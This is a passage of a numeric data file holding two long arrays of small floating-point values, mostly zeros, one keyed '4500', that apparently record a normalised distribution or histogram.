0.00574297039341567, 0.004034841906266755, 0.0048849912036502486, 0.004507992190322197, 0.0038260678093008237, 0.0038857747194541116, 0.0024989222311107852, 0.002563215706072941, 0.0022220756590550757, 0.0020508358946362965, 0.002264615510632821, 0.0024208989548342966, 0.001346622367892596, 0.001552919993256032, 0.0012403534052863702, 0.0011651693738090301, 0.0014025035605417983, 0.001049285794866657, 0.0005078774430570624, 0.0006716646593050901, 0.0007352141112266563, 0.0005257397793720294, 0.000637895056304325, 0.00030244551621632325, 0.0010415890695401457, 0.0001123332179363374, 0.0005194830308004327, 0.00019925693367795345, 0.000603937194293744, 0.0007236784493313366, 0.00031428746984993533, 0.0004017444265141787, 0.0003592010448452857, 0.00032376332356065486, 0.0002150348638327707, 0.0002005311463655774, 0.00026854539372850143, 0.0, 0.0003260291914274535, 0.00020079751803057347, 9.834980398325718e-05, 0.0, 0.0002940191886471017, 0.0, 0.0, 0.00021076878623510774, 0.00030233069436862473, 9.849739183655404e-05, 0.0, 0.00011014747187233996, 0.0003121509009599563, 9.334210681131781e-05, 0.00018779333821786952, 9.849739183655404e-05, 0.00019552179681054768, 9.834980398325718e-05, 9.776089840527384e-05, 0.0, 0.00018529955414708647, 0.00010303661962529963, 0.00010586170650569711, 0.00011014747187233996, 0.00011771347116390817, 0.00010876223030729308, 0.0, 0.0, 0.00010300682039843168, 0.0, 0.000213541222181581, 0.00021791744613388004, 0.0, 0.00010586170650569711, 0.00010300682039843168, 0.00010233662883865163, 0.00010140887206466384, 0.0, 1.553100215675363e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.880777697841115e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00010120801363378389, 0.0, 0.0, 0.0, 9.928241463257287e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.334210681131781e-05, 9.752432596714571e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.715284226532821e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.478652720797812e-05, 0.0, 0.0, 0.00011199823481893081, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00010140887206466384, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00011090860083333078, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
4500 : [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.600325197683399e-05, 0.0, 0.0, 0.00010742822522682623, 0.0, 0.0, 0.0, 0.0, 0.0, 9.90041907769529e-05, 0.0, 0.0, 0.0, 9.39088020009381e-05, 0.00020290489359851203, 0.0, 0.0, 0.00020448908921353456, 9.536108632130073e-05, 0.0002985088385903463, 0.00021522579172188566, 9.916483360131202e-05, 0.0, 0.00019106353325019037, 0.00020384128772475002, 0.00019255396517081448, 0.0001406364793848756, 0.00010310145881200793, 0.00048656494276996603, 0.00010853608504862874, 0.00038415651883429256, 9.749450381194338e-05, 0.00028133292472599936, 0.0004900563975685605, 0.0002878990415829557, 0.0005124934351337689, 0.00021836487316675241, 9.101683415124945e-05, 0.0002998205291531841, 0.0002880674779102642, 0.0001957334554537863, 0.00011727981710232256, 0.00020019839903606765, 9.7555738477974e-05, 0.0003411002027483729, 0.0005751654544104435, 0.00019656298451521933, 0.0007797644294263603, 0.00020524553368695528, 0.00032087434508972493, 0.0004012030070394718, 0.0003869937681804387, 0.0003973131255851144, 0.0004686666410907124, 0.0001949818786832044, 0.0006561008185565666, 0.0008383632861538465, 0.0005167838836522296, 0.0001936612639984955, 0.0003127982737167165, 0.00036968445854467956, 0.0005641990032326442, 0.0002889461845794551, 0.00027062801763831873, 0.00038864947759993337, 0.0006011999660325296, 0.0006324999166948731, 0.0009422798349016681, 0.0006052159934881137, 0.0005053745060388149, 0.0007117676610847683, 0.00039073074852931356, 0.0005854449035563841, 0.0007378389393985092, 0.00047964331099220164, 0.0006659498730124979, 0.0004069927770777126, 0.000804852431766664, 0.0011950732452702196, 0.000598493730390449, 0.0005999196566177803, 0.00041833359257880217, 0.0005886467472974277, 0.00032983347299403557, 3.695780940592446e-05, 0.0005622759153841673, 9.651718300687281e-05, 0.0010062944770939718, 0.0005021623400059357, 0.0003890812186758341, 0.0008325283258814498, 0.00020722235614159233, 0.0006562340071916877, 0.0007035111394795726, 0.0011973418019293903, 0.0014202769302210465, 0.0006088437094434794, 0.000502484954779188, 0.0007150950984635959, 0.0007411174235672274, 0.001267750879516116, 0.0008321418786078504, 0.0014648721308583297, 0.0005700390038214556, 0.0009357024291168516, 0.0011565734442685663, 0.00048802829162054027, 0.0010225429382153095, 0.0009981286121388093, 0.0013713518906472949, 0.0009157952506419267, 0.0003931793411480896, 0.0008560153718285164, 0.001071024913262585, 0.000510659312322282, 0.0005937348431498631, 0.0008439958052244936, 0.0010293751906835019, 0.0007653763974254681, 0.0012299806815768398, 0.0011627965779503209, 0.0016589411599070413, 0.0006231601413331115, 0.0012742661444136287, 0.0010120597014817276, 0.0011013946838874208, 0.0008143570185706414, 0.0010639017033509499, 0.0009527638311349837, 0.0020252575478371393, 0.0007971468236501317, 0.0011202851684006252, 0.0018436835322257553, 0.001904661142119231, 0.001132314125183174, 0.0006568510662026144, 0.0017211234744690467, 0.0013439581161608686, 0.0011292619719351022, 0.0014709333530059426, 0.0018388152770235147, 0.0010834588214940636, 0.0013847776364855726, 0.0019324012484842308, 0.001023155233091543, 0.0017835593238512517, 0.0014176643892279339, 0.0017154211504683285, 0.0018974075053896885, 0.001231592340011779, 0.0013202951424573016, 0.0013090052479610861, 0.0008316296996056064, 0.0019349367347770866, 0.001749346622664688, 0.0019703067754669686, 0.0011014756051317765, 0.0016958899934070217, 0.002000849712031091, 0.0024221603709524728, 0.0013021777596275868, 0.0027104407849698983, 0.0019315688367760812, 0.002326074264459234, 0.0021536915765343854, 0.0017073750102893713, 0.001668777233822069, 0.0020366160734911105, 0.002666499996921354, 0.002475542983508817, 0.0021359811474710804, 0.0024579361225910185, 0.0029236326364049, 0.00237891114193419, 0.002651247308996345, 0.003634330507592018, 0.002511205500641609, 0.0015594522184250459, 0.0025101673335510537, 0.0034180194597960866, 0.0024929609361292126, 0.0026706139998425873, 0.002890522038377384, 0.0029068416162919696, 0.0033532443512340453, 0.0031695934490781072, 0.0029760972209194763, 0.0041191418345222705, 0.004216670990509565, 0.0023886548330634264, 0.004479027607252451, 0.004199737460628418, 0.0034810844511395274, 0.003981521587500334, 0.004311114644305934, 0.0028534023864827487, 0.002952024117359704, 0.00335678389617487, 0.003000128344857603, 0.004443168172552336, 0.0031792305340629023, 0.004081001967348967, 0.004346216788726106, 0.0036477338827108664, 0.004422503703797469, 0.00345801250631965, 0.004360237706173894, 0.005277067119271416, 0.004128898782374132, 0.006161510911359968, 0.004114797496045432, 0.004111251046561573, 0.0060276831917356125, 0.004666016717874349, 0.0073140973272536915, 0.005868958794658419, 0.005135486426365317, 0.006348961521638242, 0.005165858130262203, 0.006770908641336475, 0.005939597793528168, 0.004678394630261823, 0.0056754763755858546, 0.005022201103174992, 0.007021132595060445, 0.0066421963595549695, 0.006718857777040482, 0.008687703689292368, 0.006379921492601604, 0.008609335468768912, 0.008285920044706473, 0.008924232896181465, 0.007270530213074135, 0.008825011298605736, 0.009614002821251548, 0.010350145314426663, 0.012222434230350408, 0.011603174051104484, 0.011163539149244096, 0.013509668625580899, 0.01263889306688197, 0.013876664420545519, 0.012936021514706292, 0.013134321095362647, 0.01512216223404556, 0.015024064696075727, 0.019407508295204354, 0.016219729384502217, 0.017934465466210737, 0.018097320989475887, 0.020501826443891046, 0.021727741868620472, 0.02041622778590264, 0.021014070625021298, 0.022349466693547728, 0.021791999412636702, 0.023641815974257623, 0.02002860342580693, 0.018515810314022815, 0.017895723799066614, 0.014676311034001022, 0.013646937569453278, 0.015436493488929346, 0.013152682760924897, 0.009582704803861255, 0.01026360874331255, 0.006838518479086456, 0.008956646135362572, 0.007212502776328122, 0.004041494724473259, 0.0034778790860815366, 0.004636915449895674, 0.0030505693458998456, 0.0032913550654783924, 0.002334506368593778, 0.002760655593182355, 0.0019070238767453823, 0.001779794552716666, 0.0016052733897234028, 0.0011193439410942636, 0.0010810938774141413, 0.0010190506203488357, 0.0012394104921797616, 0.0006181872132584792, 0.00035409876450915207, 0.0005193803370600735, 0.0005144608846712376, 0.0007147831512093308, 0.0004988388036939222, 0.0003209499843586597, 0.0008291636730156702, 0.0004905030524574143, 0.0004179676517980131, 0.0005113303993824478, 0.00031821927211152446, 0.00021283688887763645, 0.0002148454549688712, 0.00010268413096969014, 0.00020367060742095555, 0.0002007883922383021, 0.0005900070803659383, 0.00021957655142374624, 0.00025072104629968476, 0.000425348780914674, 0.0, 0.0002975501427901093, 0.000101753225955164, 0.00021090475607778538, 0.00011201694137366643, 0.00010520556651747229, 9.785548195242693e-05, 0.0, 0.000213907990638463, 0.0002102119542297783, 0.00012223134109355026, 0.00028424363841002466, 9.809286014192746e-05, 7.378325224888272e-06, 0.0, 0.00011117047892044313, 0.00010914902722577163, 0.0, 0.0, 0.0, 9.96195495441576e-05, 0.00011237854092302302, 0.0, 9.37825351702083e-05, 0.0, 0.0, 0.0, 0.000101753225955164, 3.776422982489137e-05, 0.0, 9.785548195242693e-05, 0.0, 0.00010031400848249276, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00011052149502866404, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00010116885132482329, 0.0, 0.00010268413096969014, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
